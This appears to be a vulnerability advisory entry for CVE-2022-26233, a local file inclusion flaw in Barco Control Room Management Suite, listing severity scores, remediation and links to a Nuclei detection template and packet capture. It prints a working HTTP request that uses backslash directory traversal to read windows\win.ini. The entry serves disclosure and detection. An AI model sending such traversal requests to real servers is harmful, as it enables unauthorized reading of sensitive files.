| Title | Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.84035 |
| CVE ID | CVE-2022-26233 |
| CWE ID | CWE-22 |
| Tags | cve cve2022 barco lfi seclists packetstorm vuln |
Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the “GET /....” substring.
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: www.victim.com
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26233.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-26233.pcap
N/AN/A